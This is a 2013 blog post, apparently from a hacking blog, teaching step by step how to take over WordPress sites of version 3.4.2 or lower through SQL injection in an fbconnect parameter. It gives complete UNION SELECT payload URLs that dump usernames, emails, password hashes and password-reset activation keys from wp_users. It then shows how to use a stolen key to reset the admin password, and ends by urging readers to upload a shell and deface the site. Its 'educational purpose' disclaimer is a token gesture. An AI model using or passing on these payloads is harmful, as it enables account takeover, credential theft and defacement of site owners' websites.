Saturday, 27 April 2013

Hacking Wordpress without hash cracking

Hey puntos today i am back with a new post for you . This post is about hacking worpdress blogs without cracking there hashes.

As we all know now the worpdress blogs are using higher alogrithem to encrypt blog passwords, which are not easy to crack. The only methods to crack these hashes is Brute Force but brute force takes too much time.


Now lets get started--->

Things you need --->

1. Wordpress version <= 3.4.2
2. Sql injection vulnerable wordpress site(make sure version of wp site is 3.4.2 or less than it)

Lets start --->

Find SQLi vulnerable worpdress site.
Like i get www.site.com?fbconnect_action=myhome&fbuserid=1

nw add this code after the wordpress site address
+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,0x3a,user_pass)%E2%80%8B,7,8,9,10,11,12+from+wp_users--
Nw address will look like
http://target.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,0x3a,user_pass)%E2%80%8B,7,8,9,10,11,12+from+wp_users--
lets start pwning

First go to http://target.com/wp-login.php
Now click on Lost your password ?

Now the wordpress will ask you for the username or email, enter the username or email id which you got on the field and click get password.

Now it will be saying "Check your e-mail for the confirmation link."
now what wordpress does is it sends an activation key to the email address also it sets the value of activation key in the database as well. 

we will be getting the user activation key by sqli this is what its all about.

Add column name user_activation_key to extract
http://target/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activa%E2%80%8Btion_key),7,8,9,10,11,12+from+wp_users--
Now you will be able to see the activation key

Now .. finally all we have to do is enter the following url to end of the site and edit it with your activation key and username

wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE

eg:- 
http://target.com/wp-login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=admin
Now the wordpress will ask u for ur new password enter your desired password & click change.

Now you will be able to login to site. 

Now upload shell and then deface it.

Note -->
1. Only for educational purpose.
2. This hack only works on Worpdress versions 3.4.2 or less than it..

No comments:

Post a Comment